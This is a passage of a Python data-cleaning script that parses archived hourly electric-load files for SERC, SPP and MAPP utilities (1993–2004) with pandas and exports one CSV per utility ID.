1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/APCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Alabama'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 2].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Alabama'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 2].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 2].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 1].values
},
7140 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).replace(np.nan, 0).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Georgia'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 3].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Georgia'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 3].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 3].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 2].values
},
7801 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GUCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GUCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Gulf'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 4].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Gulf'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 4].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 4].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 3].values
},
12686 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/MPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/MPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Mississippi'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 5].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Mississippi'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 5].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 5].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 4].values
},
16687 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/SECO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/SECO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Savannah'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 6].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Savannah'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 6].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 6].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 5].values
},
18195 : {
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['System'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 7].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Southern'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 7].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 8].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 7].values
}
}
# ---- SERC post-processing and per-utility CSV export ----
# Combine the two ODEC sub-series (IDs 402290 and 402291) into a single
# synthetic utility 40229 by element-wise addition of each year's array.
serc.update({40229 : {}})
for i in serc[402290].keys():
    serc[40229][i] = serc[402290][i] + serc[402291][i]

# Zero out clearly corrupt readings so the cleaning step below turns them
# into NaN: loads above a hard threshold (data-entry spikes) and negative
# values.  Thresholds (2000 / 20000 MW) match the units of those series.
serc[189][2001][serc[189][2001] > 2000] = 0
serc[3408][2002][serc[3408][2002] > 2000] = 0
serc[3408][2003][serc[3408][2003] > 2000] = 0
serc[7140][1999][serc[7140][1999] < 0] = 0
serc[7140][1994][serc[7140][1994] > 20000] = 0

# Write one CSV per utility: all years concatenated into a single hourly
# series, each year indexed from Jan 1 with hourly frequency.
if not os.path.exists('./serc'):
    # Use the same './serc' spelling as the existence check above.
    os.mkdir('./serc')
for k in serc.keys():
    print(k)  # parenthesized: identical output on Python 2, valid on Python 3
    s = pd.DataFrame(
        pd.concat([
            pd.Series(serc[k][i],
                      index=pd.date_range(start=datetime.date(i, 1, 1),
                                          freq='h',
                                          periods=len(serc[k][i])))
            for i in serc[k].keys()
        ]).sort_index(),
        columns=['load'])
    # Zero is used throughout as a missing-data sentinel -> convert to NaN.
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./serc/%s.csv' % k)
###### SPP
# AECC: 807
# CAJN: 2777
# CLEC: 3265
# EMDE: 5860
# ENTR: 12506
# KCPU: 9996
# LEPA: 26253
# LUS: 9096
# GSU: 55936 <- 7806
# MPS: 12699
# OKGE: 14063
# OMPA: 14077
# PSOK: 15474
# SEPC: 18315
# WFEC: 20447
# WPEK: 20391
# CSWS: 3283
# SRGT: 40233
# GSEC: 7349
spp = {
807 : {
1993 : pd.read_csv('%s/spp/1993/AECC93' % (fulldir), skiprows=6, skipfooter=1, header=None).iloc[:, -1].values,
1994 : pd.read_csv('%s/spp/1994/AECC94' % (fulldir), skiprows=8, skipfooter=1, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/spp/1995/AECC95' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1996 : pd.read_csv('%s/spp/1996/AECC96' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1997 : pd.read_csv('%s/spp/1997/AECC97' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1998 : pd.read_csv('%s/spp/1998/AECC98' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1999 : pd.read_csv('%s/spp/1999/AECC99' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/AECC03' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -2].values,
2004 : pd.read_csv('%s/spp/2004/AECC04' % (fulldir), skiprows=5, header=None).iloc[:, -2].values
},
2777 : {
1998 : pd.read_excel('%s/spp/1998/CAJN98' % (fulldir), skiprows=4).iloc[:365, 1:].values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CAJN99' % (fulldir)).readlines()[:]])[2].astype(float).values
},
3265 : {
1994 : pd.read_fwf('%s/spp/1994/CLEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/CLEC96' % (fulldir)).readlines()[:]])[0].astype(float).values,
1997 : pd.read_csv('%s/spp/1997/CLEC97' % (fulldir)).iloc[:, 2].str.replace(',', '').astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/CLEC98' % (fulldir)).readlines()[:]])[1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CLEC99' % (fulldir)).readlines()[1:]]).iloc[:, 0].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/CLEC01' % (fulldir)).readlines()[:]])[4].replace('NA', '0').astype(float).values,
},
5860 : {
1997 : pd.DataFrame([i.split() for i in open('%s/spp/1997/EMDE97' % (fulldir)).readlines()[:]])[3].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/EMDE98' % (fulldir)).readlines()[2:-2]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/EMDE99' % (fulldir)).readlines()[3:8763]])[2].astype(float).values,
2001 : pd.read_excel('%s/spp/2001/EMDE01' % (fulldir))['Load'].dropna().values,
2002 : pd.read_excel('%s/spp/2002/EMDE02' % (fulldir))['Load'].dropna().values,
2003 : pd.read_excel('%s/spp/2003/EMDE03' % (fulldir))['Load'].dropna().values,
2004 : pd.read_excel('%s/spp/2004/EMDE04' % (fulldir), skiprows=2).iloc[:8784, -1].values
},
12506 : {
1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/ENTR94' % (fulldir)).readlines()[:]]).iloc[:, 1:-1].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/ENTR95' % (fulldir)).readlines()[1:-2]]).iloc[:, 1:-1].astype(float).values.ravel(),
1997 : pd.read_csv('%s/spp/1997/ENTR97' % (fulldir), header=None).iloc[:, 1:-1].astype(float).values.ravel(),
1998 : pd.read_csv('%s/spp/1998/ENTR98' % (fulldir), header=None)[2].astype(float).values,
1999 : pd.read_excel('%s/spp/1999/ENTR99' % (fulldir)).iloc[:, -1].values,
2000 : pd.DataFrame([i.split() for i in open('%s/spp/2000/ENTR00' % (fulldir)).readlines()[4:]]).iloc[:, 3:].astype(float).values.ravel(),
2001 : pd.read_fwf('%s/spp/2001/ENTR01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
9996 : {
1994 : pd.read_fwf('%s/spp/1994/KCPU94' % (fulldir), skiprows=4, header=None).astype(str).apply(lambda x: x.str[-3:]).astype(float).values.ravel(),
1997 : pd.read_csv('%s/spp/1997/KCPU97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/KCPU98' % (fulldir), engine='python', header=None)[0].values,
1999 : pd.read_csv('%s/spp/1999/KCPU99' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
2000 : pd.read_csv('%s/spp/2000/KCPU00' % (fulldir), engine='python', header=None)[0].values,
2002 : pd.read_excel('%s/spp/2002/KCPU02' % (fulldir)).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/KCPU03' % (fulldir), engine='python', header=None)[0].values,
2004 : pd.read_csv('%s/spp/2004/KCPU04' % (fulldir), engine='python', header=None)[0].values
},
26253 : {
1993 : pd.read_csv('%s/spp/1993/LEPA93' % (fulldir), skiprows=3, header=None)[0].values,
1994 : pd.read_csv('%s/spp/1994/LEPA94' % (fulldir), skiprows=3, header=None)[0].values,
1995 : pd.read_csv('%s/spp/1995/LEPA95' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
1996 : pd.read_csv('%s/spp/1996/LEPA96' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
1997 : pd.read_csv('%s/spp/1997/LEPA97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None),
1998 : pd.Series(pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[[1,3]].values.ravel(order='F')).dropna().values,
1999 : pd.read_csv('%s/spp/1999/LEPA99' % (fulldir), sep='\t')['Load'].values,
2001 : pd.read_csv('%s/spp/2001/LEPA01' % (fulldir), engine='python', sep='\t', header=None)[1].values,
2002 : pd.read_csv('%s/spp/2002/LEPA02' % (fulldir), engine='python', sep='\t', header=None)[1].values,
2003 : pd.read_excel('%s/spp/2003/LEPA03' % (fulldir), header=None)[1].values
},
9096 : {
1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/LUS93' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/LUS94' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/LUS95' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/LUS96' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
1997 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1997/LUS97' % (fulldir)).readlines()[3:-2]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1998/LUS98' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split(' ') for i in open('%s/spp/1999/LUS99' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
2000 : pd.read_csv('%s/spp/2000/LUS00' % (fulldir), skiprows=3, skipfooter=1, header=None).iloc[:, -1].values,
2001 : pd.read_csv('%s/spp/2001/LUS01' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2002 : pd.read_csv('%s/spp/2002/LUS02' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/LUS03' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2004 : pd.read_csv('%s/spp/2004/LUS04' % (fulldir), skiprows=4, header=None).iloc[:, -1].values
},
55936 : {
1993 : pd.read_csv('%s/spp/1993/GSU93' % (fulldir), engine='python', header=None)[0].values
},
12699 : {
1993 : pd.read_csv('%s/spp/1993/MPS93' % (fulldir), sep=' ', skipinitialspace=True)['TOTLOAD'].values,
1996 : pd.read_excel('%s/spp/1996/MPS96' % (fulldir), skiprows=6, header=None).iloc[:, -1].values,
1998 : pd.read_csv('%s/spp/1998/MPS98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2000 : pd.read_csv('%s/spp/2000/MPS00' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2001 : pd.read_csv('%s/spp/2001/MPS01' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2002 : pd.read_csv('%s/spp/2002/MPS02' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2003 : pd.read_excel('%s/spp/2003/MPS03' % (fulldir)).iloc[:, 1:].values.ravel()
},
14063 : {
1994 : pd.read_csv('%s/spp/1994/OKGE94' % (fulldir), header=None).iloc[:, 1:13].values.ravel()
},
14077 : {
1993 : pd.read_csv('%s/spp/1993/OMPA93' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/spp/1997/OMPA97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/OMPA98' % (fulldir), skiprows=2, engine='python', header=None)[0].str.replace('\*', '').astype(float).values,
2000 : pd.read_csv('%s/spp/2000/OMPA00' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2001 : pd.read_csv('%s/spp/2001/OMPA01' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2002 : pd.read_csv('%s/spp/2002/OMPA02' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2003 : pd.read_csv('%s/spp/2003/OMPA03' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2004 : pd.read_csv('%s/spp/2004/OMPA04' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000
},
15474 : {
1993 : pd.read_fwf('%s/spp/1993/PSOK93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
18315 : {
1993 : pd.read_csv('%s/spp/1993/SEPC93' % (fulldir), header=None).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('NA', '').str.strip()).replace('', '0').astype(float).values.ravel(),
1997 : (pd.read_fwf('%s/spp/1997/SEPC97' % (fulldir), skiprows=1, header=None)[5]/1000).values,
1999 : pd.read_csv('%s/spp/1999/SEPC99' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].str.strip().replace('#VALUE!', '0').astype(float).values,
2000 : pd.read_csv('%s/spp/2000/SEPC00' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
2001 : pd.read_csv('%s/spp/2001/SEPC01' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
2002 : (pd.read_fwf('%s/spp/2002/SEPC02' % (fulldir), skiprows=1, header=None)[6]).str.replace('"', '').str.strip().astype(float).values,
2004 : pd.read_csv('%s/spp/2004/SEPC04' % (fulldir), header=None, sep='\t')[5].values
},
20447 : {
1993 : pd.read_csv('%s/spp/1993/WFEC93' % (fulldir)).iloc[:, 0].values,
2000 : pd.read_csv('%s/spp/2000/WFEC00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[0].values
},
20391 : {
1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/WPEK93' % (fulldir)).readlines()[:]]).iloc[:365, 1:25].astype(float).values.ravel(),
1996 : pd.read_excel('%s/spp/1996/WPEK96' % (fulldir), skiprows=2).dropna().iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/WPEK98' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2000 : pd.read_csv('%s/spp/2000/WPEK00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2001 : pd.read_csv('%s/spp/2001/WPEK01' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2002 : pd.read_csv('%s/spp/2002/WPEK02' % (fulldir), header=None, sep=' ', skipinitialspace=True)[4].values
},
3283 : {
1997 : pd.read_fwf('%s/spp/1997/CSWS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/CSWS98' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True, header=None)[2].values,
1999 : pd.read_csv('%s/spp/1999/CSWS99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[2].values,
2000 : pd.read_csv('%s/spp/2000/CSWS00' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None)[2].values
},
40233 : {
2000 : pd.read_fwf('%s/spp/2000/SRGT00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/spp/2001/SRGT01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
7349 : {
1997 : pd.read_csv('%s/spp/1997/GSEC97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/GSEC98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/spp/1999/GSEC99' % (fulldir), sep='\s', skipinitialspace=True, skiprows=2, header=None)[17].dropna().values,
2000 : pd.read_csv('%s/spp/2000/GSEC00' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/GSEC01' % (fulldir)).readlines()[1:]])[0].astype(float).values,
2002 : pd.read_csv('%s/spp/2002/GSEC02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[5].values,
2003 : pd.read_csv('%s/spp/2003/GSEC03' % (fulldir), header=None)[2].values,
2004 : (pd.read_csv('%s/spp/2004/GSEC04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[5]/1000).values
}
}
# Manual QC fixes for known-bad SPP series (grounded in inspection of the
# raw archives — thresholds/years to confirm against source files):
spp[9096][2003][spp[9096][2003] > 600] = 0  # values > 600 presumably spurious — TODO confirm threshold
spp[9996][2002] = np.repeat(np.nan, len(spp[9996][2002]))  # 2002 series blanked out (judged unusable)
spp[7349][2003] = np.repeat(np.nan, len(spp[7349][2003]))  # 2003 series blanked out (judged unusable)
if not os.path.exists('./spp'):
    os.mkdir('spp')
# Export one CSV per utility: place each year's flat hourly array on an
# hourly DatetimeIndex starting Jan 1 of that year, concatenate the years,
# sort chronologically, and convert 0 (the archives' missing marker) to NaN.
for k in spp.keys():
    print k
    s = pd.DataFrame(pd.concat([pd.Series(spp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(spp[k][i]))) for i in spp[k].keys()]).sort_index(), columns=['load'])
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./spp/%s.csv' % k)
###### MAPP
# CIPC: 3258
# CP: 4322
# CBPC: 4363
# DPC: 4716
# HUC: 9130
# IES: 9219
# IPW: 9417 <- 9392
# IIGE: 9438
# LES: 11018
# MPL: 12647
# MPC: 12658
# MDU: 12819
# MEAN: 21352
# MPW: 13143
# NPPD: 13337
# NSP: 13781
# NWPS: 13809
# OPPD: 14127
# OTP: 14232
# SMMP: 40580
# UPA: 19514
# WPPI: 20858
# MEC: 12341 <- 9435
# CPA: 4322
# MWPS: 23333
# -- Layout helpers for the fixed-width MAPP archives ------------------------
# Most MAPP files hold one block per row: a 20-char date field followed by
# twelve 5-char hourly values.  "Wide" files repeat that layout twice per row.
# '.' is the archives' missing-value marker and is mapped to '0' before the
# float cast (zeros are converted to NaN at export time below).
_mapp_w1 = [20] + [5] * 12                   # single-block row layout
_mapp_w2 = _mapp_w1 + _mapp_w1               # double-block ("wide") row layout
_mapp_hours = range(1, 13) + range(14, 26)   # hour columns of a wide row (skips both date fields; Python 2 list concat)
# Hourly load data: EIA utility id -> year -> flat numpy array of hourly MW.
# NOTE(fix): the original literal defined key 4322 (CP/CPA) twice with
# identical entries; since dict last-key-wins made the first a silent,
# redundant re-read of the same files, the duplicate has been removed.
mapp = {
    3258 : {
        1998 : pd.read_fwf('%s/mapp/1998/CIPC98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    4322 : {
        1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
    },
    4363 : {
        1993 : pd.read_fwf('%s/mapp/1993/CBPC93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/CBPC94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/CBPC96' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/CBPC98' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/CBPC99' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/CB02' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
    },
    4716 : {
        1993 : pd.read_fwf('%s/mapp/1993/DPC93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/DPC94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_csv('%s/mapp/1996/DPC96' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 6:].values.ravel()
    },
    9130 : {
        1993 : pd.read_fwf('%s/mapp/1993/HUC93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/HUC94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/HUC96' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/HUC97' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/HUC98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1999 : pd.read_fwf('%s/mapp/1999/HUC99' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2002 : pd.read_fwf('%s/mapp/2002/HUC02' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        2003 : pd.read_fwf('%s/mapp/2003/HUC03' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    9219 : {
        1993 : pd.read_fwf('%s/mapp/1993/IESC93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/IES94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/IESC96' % (fulldir), widths=_mapp_w1, header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/IES97' % (fulldir), widths=_mapp_w1, header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/IESC98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    9417 : {
        1993 : pd.read_fwf('%s/mapp/1993/IPW93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/IPW94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/IPW95' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/IPW96' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/IPW97' % (fulldir), widths=_mapp_w2, header=None).iloc[:-1, _mapp_hours].values.ravel(),
        1998 : pd.read_fwf('%s/mapp/1998/IPW98' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel()
    },
    9438 : {
        1993 : pd.read_fwf('%s/mapp/1993/IIGE93' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/IIGE94' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        1995 : pd.read_fwf('%s/mapp/1995/IIGE95' % (fulldir), widths=_mapp_w1, header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
    },
    11018 : {
        1993 : pd.read_fwf('%s/mapp/1993/LES93' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1994 : pd.read_fwf('%s/mapp/1994/LES94' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
        1995 : pd.read_csv('%s/mapp/1995/LES95' % (fulldir)).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/mapp/1996/LES96' % (fulldir), widths=_mapp_w2, header=None, skipfooter=1).iloc[:, _mapp_hours].values.ravel(),
        1997 : pd.read_fwf('%s/mapp/1997/LES97' % (fulldir), widths=_mapp_w2, header=None).iloc[:, _mapp_hours].values.ravel(),
